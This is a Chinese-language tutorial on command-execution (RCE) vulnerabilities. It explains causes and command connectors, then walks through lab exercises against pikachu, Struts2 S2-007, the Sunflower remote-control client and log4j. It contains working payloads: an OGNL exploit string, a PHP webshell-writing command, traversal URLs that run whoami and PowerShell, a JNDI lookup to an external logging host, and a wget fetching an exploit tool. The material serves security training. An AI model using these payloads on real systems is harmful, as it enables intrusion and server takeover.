Web渗透-命令执行漏洞-及常见靶场检测实战

本文涉及的产品
多模态交互后付费免费试用,全链路、全Agent
简介: 命令执行漏洞(RCE)指应用程序调用系统命令时,用户可控制输入参数,导致恶意命令被拼接执行,从而危害系统安全。常见于PHP的system、exec等函数。攻击者可通过命令连接符在目标系统上执行任意命令,造成数据泄露或服务瘫痪。漏洞成因包括代码层过滤不严、第三方组件缺陷等。可通过参数过滤、最小权限运行等方式防御。本文还介绍了绕过方式、靶场测试及复现过程。

一、概述

命令执行(RCE):应用有时需要调用一些执行系统命令的函数,如php中的system,exec,shell exec,passthru,popen,proc popen等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

二、利用条件

1 应用调用执行系统命令的函数
2 将用户输入作为系统精灵的参数拼接到命令行中
3 没有对用户输入进行过滤

三、漏洞分类

1 代码层过滤不严
商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:
system("/bin/program--arg $arg");
2 系统的漏洞造成命令注入
比如:bash破壳漏洞 (cve-2014-6271)
3 调用的第三方组件存在代码执行漏洞
如wordpress中用来处理图片的imagemagick组件
java中的命令执行漏洞(struts2/elasticsearchgroovy等)
thinkphp命令执行
4 远程命令执行漏洞(执行的是命令)
指 用户通过浏览器提交执行操作命令,由于服务器端,没有针对执行函数做过滤,就执行了恶意命令。
5 远程代码执行漏洞(执行的是代码)
也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的脚本代码

三、命令执行漏洞攻击

1. 命令连接符(windows)

| || & && 的区别:
& :无论左边还是false还是true,右边都会执行(可以同时执行多条命令)
&&: 左边错误,右边也不执行
| :都为true,只执行右边的命令
|| : 左边为false,才会执行右边的

2. 命令连接符(Linux)

& : 后台运行( 杀进程命令:kill -s 9)
; :连接符 
&& : 左边的执行成功后,右边的才会执行
|| : 左边错,执行右边

五、PHP执行系统命令内置函数

system()
exec()
shell_exec()
passthru()
pcntl_exec()
popen()
proc_open()

六、绕过方式

注意点:在Linux下,passwd是命令,/etc/passwd是文件

情景一:路径被过滤

# 使用通配符
* :多个
? : 一个
# 特殊方式 
# /'

# 未初始化变量 $a(和空格的作用类似)
cat$a /etc$a/passwd$a

七、pikachu靶场测试

一、命令执行漏洞

#  输入
| dir

二、代码执行漏洞

# 输入
system("ipconfig");

三、代码执行漏洞-写入木马示例

# cmd示例:
echo "<?php @eval($_POST['cmd'])?>;" > a.php

七、漏洞复现-struts2-S2-007

# 原理
参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html
当配置了验证规则 `<ActionName>-validation.xml` 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction:
```java
(...)
public class UserAction extends ActionSupport {
    private Integer age;
    private String name;
    private String email;
(...)
```
然后配置有 UserAction-validation.xml:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
    "-//OpenSymphony Group//XWork Validator 1.0//EN"
    "http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
    <field name="age">
        <field-validator type="int">
            <param name="min">1</param>
            <param name="max">150</param>
        </field-validator>
    </field>
</validators>
```
当用户提交 age 为字符串而非整形数值时,后端用代码拼接 `"'" + value + "'"` 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。
因为受影响版本为 Struts2 2.0.0 - Struts2 2.2.3,所以这里给出绕过安全配置进行命令执行的 Payload(**弹计算器,无法在本项目环境下运行**):
```
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app")) + '
```
## Exploit
@rickgray 在原文中只给了弹计算器的POC,我给出执行任意代码的EXP:
```
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '
```
将Exp传入可以利用的输入框(age),得到命令执行结果:
                                                                                                                                                                        25,0-1        88%
  • 复现过程:
  • 启动docker容器:docker-compose  up -d
  • 查看dock容器启动端口:docker ps

  • 查看dock容器启动端口:访问8080端口

  • 传递文档中的参数编码并抓包

# url编码网址:https://www.qianbo.com.cn/Tool/Url-Encode.html
# 源 
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '
#编码后结果
'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('ls').getInputStream()))%20%2B%20'

  • 结果:

七、向日葵漏洞

版本:11.0.0.33162
启动向日葵后会启动一个4万以上的端口,通过nmap可以扫描出。
获取cookie网址:ip:端口cgi-bin/rpc?action=verify-haras(verify_string:参数值)
#注入:
http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%26c:%26%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami
http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
请求包Cookie格式:
Cookie:CID=verify_string参数值

八、log4j靶场检测

一、 靶场搭建

# 拉取容器
docker pull vulfocus/log4j2-rce-2021-12-09
# 启动
docker run -tid -p 8080:8080  vulfocus/log4j2-rce-2021-12-09
# 查看状态
docker ps

二、检测漏洞

# url编码网址:https://www.qianbo.com.cn/Tool/Url-Encode.html
命令:${jndi:ldap://域名/exp}
# 在http://www.dnslog.cn/准备一个随机url
http://varin.cn:8080/
# 步骤:
点击?????后在url添加
http://varin.cn:8080/hello?payload=${jndi:ldap://xl4nrl.dnslog.cn/exp}
# 将此进行url编码:${jndi:ldap://xl4nrl.dnslog.cn/exp}
结果为:%24%7Bjndi%3Aldap%3A%2F%2Fxl4nrl.dnslog.cn%2Fexp%7D
# 重新拼接后并访问:
http://varin.cn:8080/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2Fxl4nrl.dnslog.cn%2Fexp%7D

访问后结果:

有回显,存在漏洞

三、扩展

  • 工具下载
# 工具:JNDI-Injection-Exploit v1.0
# 下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
# kali 下载:
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
目录
相关文章
|
20天前
|
安全 PHP 开发工具
Web渗透信息收集进阶
网站敏感目录与文件指易被恶意扫描利用的路径,如后台管理、.git、.svn等,可能导致源码泄露或权限入侵。常用工具如御剑、Dirbuster、Dirsearch可探测此类信息,需加强安全防护。
372 58
Web渗透信息收集进阶
|
20天前
|
安全 网络协议 NoSQL
Web渗透-常见的端口及对其的攻击思路
本文介绍了常见网络服务端口及其安全风险,涵盖FTP、SSH、Telnet、SMTP、DNS、HTTP、SMB、数据库及远程桌面等20余个端口,涉及弱口令爆破、信息泄露、未授权访问、缓冲区溢出等典型漏洞,适用于网络安全学习与渗透测试参考。
381 59
|
20天前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
370 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
20天前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
91 0
Web渗透-文件上传漏洞-上篇
|
20天前
|
安全 中间件 应用服务中间件
WEB渗透-文件上传漏洞-下篇
本文详解文件上传安全漏洞,涵盖白名单绕过(如00截断、条件竞争)、图片木马制作与利用、以及IIS、Apache、Nginx等常见解析漏洞原理与防御。结合实战案例,深入剖析攻击手法与修复方案。
75 0
|
20天前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
294 0
web渗透-文件包含漏洞
|
5月前
|
Web App开发 前端开发 JavaScript
鸿蒙5开发宝藏案例分享---Web适配一多开发实践
这是一份实用的鸿蒙Web多设备适配开发指南,针对开发者在不同屏幕尺寸下的布局难题提供了解决方案。文章通过三大法宝(相对单位、媒体查询和窗口监听)详细介绍如何实现智能适配,并提供了多个实战案例,如宫格布局、对话框变形和自适应轮播图等。此外,还分享了调试技巧及工具推荐,帮助开发者快速上手并优化性能。最后鼓励读者实践探索,并提示更多官方资源等待发现。
|
12月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
632 3
|
7月前
|
关系型数据库 MySQL 数据库
基于Flink CDC 开发,支持Web-UI的实时KingBase 连接器,三大模式无缝切换,效率翻倍!
TIS 是一款基于Web-UI的开源大数据集成工具,通过与人大金仓Kingbase的深度整合,提供高效、灵活的实时数据集成方案。它支持增量数据监听和实时写入,兼容MySQL、PostgreSQL和Oracle模式,无需编写复杂脚本,操作简单直观,特别适合非专业开发人员使用。TIS率先实现了Kingbase CDC连接器的整合,成为业界首个开箱即用的Kingbase CDC数据同步解决方案,助力企业数字化转型。
1234 5
基于Flink CDC 开发,支持Web-UI的实时KingBase 连接器,三大模式无缝切换,效率翻倍!
|
7月前
|
机器学习/深度学习 开发框架 API
Python 高级编程与实战:深入理解 Web 开发与 API 设计
在前几篇文章中,我们探讨了 Python 的基础语法、面向对象编程、函数式编程、元编程、性能优化、调试技巧以及数据科学和机器学习。本文将深入探讨 Python 在 Web 开发和 API 设计中的应用,并通过实战项目帮助你掌握这些技术。

热门文章

最新文章